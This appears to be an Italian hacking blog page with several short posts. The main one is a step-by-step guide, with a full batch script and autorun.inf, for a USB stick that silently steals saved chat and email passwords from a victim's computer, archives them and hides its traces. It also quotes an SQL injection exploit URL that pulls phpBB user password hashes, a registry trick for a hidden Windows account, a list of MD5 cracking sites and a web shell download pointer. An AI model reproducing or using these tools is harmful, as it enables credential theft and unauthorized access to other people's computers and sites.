Se il conto alla rovescia di quando volete scaricare qualcosa da RapidShare vi scassa..allora c’è un trucchetto che non fi fà sprecare + di 1 secondo:
mentra siete nella pagina del download e stato aspettando la fine del countdown…nella barra degli indirizzi inserite questo codice:
javascript:alert(c=1)
vi si aprirà un box, cliccate su ok e scaricate il file
Da tempo ormai circola questo pericoloso trojan, che sembra diffondersi più del previsto negli ultimi giorni.
La sua rimozione fortunatamente è facile e indolore, attraverso questo tool.
Le testimonianze dicono di averlo “preso” installando AOL Active Visurs Shield-free. Fate sempre le scansioni antivirus sui file che aprite!!
Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano.
E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.
Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’operazione. Da questa necessità, ecco l’idea di usare una chiavetta USB.
Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa. Non mi assumo la responsabilità dell’uso che ne farete.
Allora…
Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.
Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.
Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.
A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su http://rarlab.com/rar/wrar362it.exe e scaricate il file. Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.
Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:
@nomedelprogramma.exe /sverhtml nomedelprogramma.html
Al termine del file scrivete, invece, le righe:
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e? %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password.
La password dell’archivio deve essere specificata al posto della parola PASSWORD.
La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:
@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e? %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.
Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:
[autorun]
open=lancia.bat
action=Preleva password
Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta.
Si aprira una finestra. Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all?interno dell?archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.
Un exploit per piattaforma forum PhpBB versione 2.0.21, che agisce attraverso Remote SQL Injection. La sintassi è la seguente:
http://www.sitovittima.com/forum.php?c=-1/**/UNION/**/SELECT/
**/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/*
(tutto attaccato ovviamente)
======================X=O=R=O=N===================== + + PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit + ======================X=O=R=O=N===================== + + Bulan: xoron + + xoron.biz + ======================X=O=R=O=N===================== + + SQL INJ: + + forum.php ?c=-1/**/UNION/**/SELECT/ **/0,1,2,3,4,user_password,6/**/FROM/**/minerva_users%20where%20user_id=2/* + ======================X=O=R=O=N===================== + + Example: http://www.ayyquerico.com/Portal/ + ======================X=O=R=O=N===================== + + Special thanx: ajann + ======================X=O=R=O=N===================== # milw0rm.com [2007-03-19]
Questa mattina, girovagando per il Web, ho trovato questo sito e visto che Msn non lascia pagine di Login in giro, ho capito che si trattava di una Fake Login (Falso Login)..
Per di più ho trovato anche il file dove venivano memorizzati i dati….
Quindi se vi ritrovate in siti come questi, allontanatevi subito…
Diventare Admin in Windows si può fare…nel registro di sistema.
Allora per prima cosa accendete il pc e loggatevi come user normale
dopo di che andate su:
Start->esegui
e scrivete regedit in modo tale da aprire il registro di sistema
andate in questa chiave di registro :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ WindowsNT\CurrentVersion\ Winlogon\SpecialAccounts\ UserList
ora cliccate col tastro destro del mouse nella parte destra della finestra e vi uscirà un elenco.
Andate su Nuovo e selezionate il valore DWORD.
Inserite il nome che volete dare all’ account nascosto (esempio : hacked)
Impostate il valore data a 0 per renderlo invisibile (1 lo rende visibile).
Riavviate il pc
Per entrare nell’ account nascosto appena creato, dalla pagina di login, premete per due volte CTRL+ALT+CANC e inserite il vostro username (hacked per esempio).
Ricordatevi che non è completamente invisibile perchè si creano le cartelle condivise e così via.
Per togliere l’user nascosto basta ritornare nel registro alla chiave di prima e cancellare il valore creato.
Questa è una lista che mostra dove trovare siti per crackare gli hash MD5
http://milw0rm.com/
http://md5.rednoize.com
http://md5.altervista.org
http://gdataonline.com/
http://www.md5lookup.com
http://www.csthis.com/md5/index.php
http://www.securitystats.com/tools/hashcrack.php
http://www.plain-text.info/search/
http://www.passcracking.ru/
http://md5.benramsey.com/
http://www.mmkey.com/md5/
http://www.passcrack.spb.ru/index.php?name=CrackMD5
http://www.und0it.com/submit.pl
http://nz.md5.crysm.net/
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.xpzone.de/
http://www.rainbowtables.net/
https://www.rainbowcrack.com
http://www.md5lookup.com
http://www.schwett.com/md5/
http://c3rb3r.openwall.net/mdcrack/
http://us.md5.crysm.net
http://ice.breaker.free.fr
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.iwebtool.com/md5
http://www.oxid.it
http://rainbowtables.shmoo.com/
Il Captain Crunch Team sforna una nuova shell , derivata dalla C100 e dalla ancor più vecchia C99 .
E’ possibile scaricare la shell da qui.
(Se usi Firefox, fai tasto destro su “qui” e clicca su “Copia Indirizzo”, apri un’altra scheda e incolla il link).
Recent Comments